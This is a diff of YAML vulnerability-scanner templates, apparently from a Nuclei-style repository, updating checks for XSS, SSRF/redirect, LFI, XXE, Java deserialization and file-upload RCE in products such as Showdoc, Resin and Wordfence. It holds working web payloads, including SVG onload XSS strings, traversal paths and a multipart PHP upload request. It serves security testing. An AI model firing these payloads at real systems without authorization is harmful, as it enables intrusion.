- '{{BaseURL}}/?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&diexample.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com' - '{{BaseURL}}/?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&diexample.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com'
matchers: matchers:
- type: regex - type: regex

View File

@ -19,21 +19,21 @@ requests:
matchers: matchers:
- type: word - type: word
words: words:
- "\"<svg/onload=confirm('q')>" - "'>\"<svg/onload=confirm('q')>"
- "\"<svg/onload=confirm('s')>" - "'>\"<svg/onload=confirm('s')>"
- "\"<svg/onload=confirm('search')>" - "'>\"<svg/onload=confirm('search')>"
- "\"<svg/onload=confirm('id')>" - "'>\"<svg/onload=confirm('id')>"
- "\"<svg/onload=confirm('action')>" - "'>\"<svg/onload=confirm('action')>"
- "\"<svg/onload=confirm('keyword')>" - "'>\"<svg/onload=confirm('keyword')>"
- "\"<svg/onload=confirm('query')>" - "'>\"<svg/onload=confirm('query')>"
- "\"<svg/onload=confirm('page')>" - "'>\"<svg/onload=confirm('page')>"
- "\"<svg/onload=confirm('keywords')>" - "'>\"<svg/onload=confirm('keywords')>"
- "\"<svg/onload=confirm('url')>" - "'>\"<svg/onload=confirm('url')>"
- "\"<svg/onload=confirm('view')>" - "'>\"<svg/onload=confirm('view')>"
- "\"<svg/onload=confirm('cat')>" - "'>\"<svg/onload=confirm('cat')>"
- "\"<svg/onload=confirm('name')>" - "'>\"<svg/onload=confirm('name')>"
- "\"<svg/onload=confirm('key')>" - "'>\"<svg/onload=confirm('key')>"
- "\"<svg/onload=confirm('p')>" - "'>\"<svg/onload=confirm('p')>"
part: body part: body
condition: or condition: or
@ -42,6 +42,14 @@ requests:
- "text/html" - "text/html"
part: header part: header
- type: word
words:
- "<title>Access Denied</title>"
- "You don't have permission to access"
part: body
condition: and
negative: true
- type: status - type: status
status: status:
- 200 - 200

View File

@ -5,6 +5,10 @@ info:
author: emenalf & tirtha_mandal author: emenalf & tirtha_mandal
severity: critical severity: critical
tags: moodle,lfi tags: moodle,lfi
reference: |
- https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
- https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
- http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf
requests: requests:
- method: GET - method: GET

View File

@ -4,6 +4,7 @@ info:
author: princechaddha author: princechaddha
severity: high severity: high
tags: myucms,lfi tags: myucms,lfi
reference: https://blog.csdn.net/yalecaltech/article/details/104908257
requests: requests:
- method: GET - method: GET

View File

@ -1,15 +1,14 @@
id: nuuo-nvrmini2-upgradehandlephp-rce id: nuuo-nvrmini2-upgradehandlephp-rce
info: info:
name: NUUO NVRmini2 3.0.8 - Remote Code Execution name: NUUO NVRmini 2 3.0.8 - Remote Code Execution
author: berkdusunur author: berkdusunur
severity: critical severity: critical
tags: rce tags: rce
reference: |
# Reference:- - https://www.exploit-db.com/exploits/45070
# https://www.exploit-db.com/exploits/45070 - https://github.com/berkdsnr/NUUO-NVRMINI-RCE
# https://github.com/berkdsnr/NUUO-NVRMINI-RCE - https://packetstormsecurity.com/files/151573/NUUO-NVRmini-upgrade_handle.php-Remote-Command-Execution.html
# https://packetstormsecurity.com/files/151573/NUUO-NVRmini-upgrade_handle.php-Remote-Command-Execution.html
requests: requests:
- method: GET - method: GET
@ -18,8 +17,8 @@ requests:
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: word
regex: words:
- "/upload_tmp_dir/" - "/upload_tmp_dir/"
part: body part: body

View File

@ -1,9 +1,10 @@
id: oa-v9-uploads-file id: oa-v9-uploads-file
info: info:
name: OA V9 Uploads File name: OA V9 RCE via File Upload
author: pikpikcu author: pikpikcu
severity: high severity: high
description: A vulnerability in OA V9 uploadOperation.jsp endpoint allows remote attackers to upload arbitrary files to the server. These files can be subsequently called and are executed by the remote software.
reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
tags: rce,jsp tags: rce,jsp

View File

@ -4,7 +4,7 @@ info:
name: PowerCreator CMS RCE name: PowerCreator CMS RCE
author: pikpikcu author: pikpikcu
severity: critical severity: critical
reference: http://www.mstir.cn/index.php/2020/11/18/powercreatorcms-rce/ reference: https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/PowerCreatorCms/PowerCreatorCms%E4%BB%BB%E6%84%8F%E4%B8%8A%E4%BC%A0/
tags: rce,powercreator tags: rce,powercreator
requests: requests:

View File

@ -1,23 +0,0 @@
id: rce-via-java-deserialization
info:
name: Java Deserialization [RCE]
author: uhnysh
severity: critical
tags: java,rce
reference: https://www.synopsys.com/blogs/software-security/mitigate-java-deserialization-vulnerability-jboss/
# This can only be used to detect the vuln, please make sure to run ysoserial over the URLs to verify.
requests:
- method: GET
path:
- "{{BaseURL}}/josso/%5C../invoker/EJBInvokerServlet/"
- "{{BaseURL}}/josso/%5C../invoker/JMXInvokerServlet/"
- "{{BaseURL}}/invoker/JMXInvokerServlet/"
- "{{BaseURL}}/invoker/EJBInvokerServlet/"
matchers:
- type: word
words:
- "org.jboss.invocation.MarshalledValue"
- "java.lang"
condition: and

View File

@ -0,0 +1,25 @@
id: resin-cnnvd-200705-315
info:
name: Caucho Resin Information Disclosure
author: princechaddha
severity: high
reference: |
- http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-315
tags: resin,caucho,lfr
requests:
- method: GET
path:
- "{{BaseURL}}/%20../web-inf/"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "/ ../web-inf/"
- "Directory of /"
condition: and
part: body

View File

@ -0,0 +1,47 @@
id: showdoc-file-upload-rce
info:
name: Showdoc < 2.8.6 File Upload RCE
author: pikpikcu
severity: critical
reference: https://github.com/star7th/showdoc/pull/1059
tags: rce,fileupload,showdoc
requests:
- raw:
- |
POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Content-Length: 239
Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633
Accept-Encoding: gzip
----------------------------835846770881083140190633
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
Content-Type: text/plain
<?php phpinfo();?>
----------------------------835846770881083140190633--
- |
GET /Public/Uploads{{url_decode("§path§")}} HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
extractors:
- type: regex
name: path
group: 1
internal: true
part: body
regex:
- '/Uploads\\(.*?)"\,"success"'
req-condition: true
matchers:
- type: dsl
dsl:
- 'contains(body_2, "PHP Extension")'
- 'contains(body_2, "PHP Version")'
- 'status_code_2 == 200'
condition: and

View File

@ -4,7 +4,10 @@ info:
name: Spring Boot Actuators (Jolokia) XXE name: Spring Boot Actuators (Jolokia) XXE
author: dwisiswant0 author: dwisiswant0
severity: high severity: high
description: todo description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to preform an XML External Entities attack, include content stored on a remote server as if it was its own - this has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine.
reference: |
- https://www.veracode.com/blog/research/exploiting-spring-boot-actuators
- https://github.com/mpgn/Spring-Boot-Actuator-Exploit
tags: springboot,jolokia,xxe tags: springboot,jolokia,xxe
requests: requests:

View File

@ -9,14 +9,19 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E" - "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- "<svg/onload=alert(1337)>" - "'>\"<svg/onload=confirm('test')>"
part: body part: body
- type: word - type: word
words: words:
- "text/html" - "text/html"
part: header part: header
- type: status
status:
- 200

View File

@ -17,4 +17,3 @@ workflows:
- template: cves/2020/CVE-2020-3187.yaml - template: cves/2020/CVE-2020-3187.yaml
- template: cves/2020/CVE-2020-3452.yaml - template: cves/2020/CVE-2020-3452.yaml
- template: cves/2018/CVE-2018-0296.yaml - template: cves/2018/CVE-2018-0296.yaml
- template: cves/2018/CVE-2018-0101.yaml

View File

@ -11,3 +11,4 @@ workflows:
- template: vulnerabilities/other/ruijie-networks-rce.yaml - template: vulnerabilities/other/ruijie-networks-rce.yaml
- template: exposures/configs/ruijie-information-disclosure.yaml - template: exposures/configs/ruijie-information-disclosure.yaml
- template: exposures/configs/ruijie-smartweb-disclosure.yaml - template: exposures/configs/ruijie-smartweb-disclosure.yaml
- template: exposures/configs/ruijie-phpinfo.yaml

View File

@ -11,11 +11,12 @@ info:
workflows: workflows:
- template: technologies/detect-springboot-actuator.yaml - template: technologies/springboot-actuator.yaml
subtemplates: subtemplates:
- template: misconfiguration/springboot/springboot-configprops.yaml - template: misconfiguration/springboot/springboot-configprops.yaml
- template: misconfiguration/springboot/springboot-env.yaml - template: misconfiguration/springboot/springboot-env.yaml
- template: misconfiguration/springboot/springboot-heapdump.yaml - template: misconfiguration/springboot/springboot-heapdump.yaml
- template: misconfiguration/springboot/springboot-httptrace.yaml
- template: misconfiguration/springboot/springboot-loggers.yaml - template: misconfiguration/springboot/springboot-loggers.yaml
- template: misconfiguration/springboot/springboot-mappings.yaml - template: misconfiguration/springboot/springboot-mappings.yaml
- template: misconfiguration/springboot/springboot-trace.yaml - template: misconfiguration/springboot/springboot-trace.yaml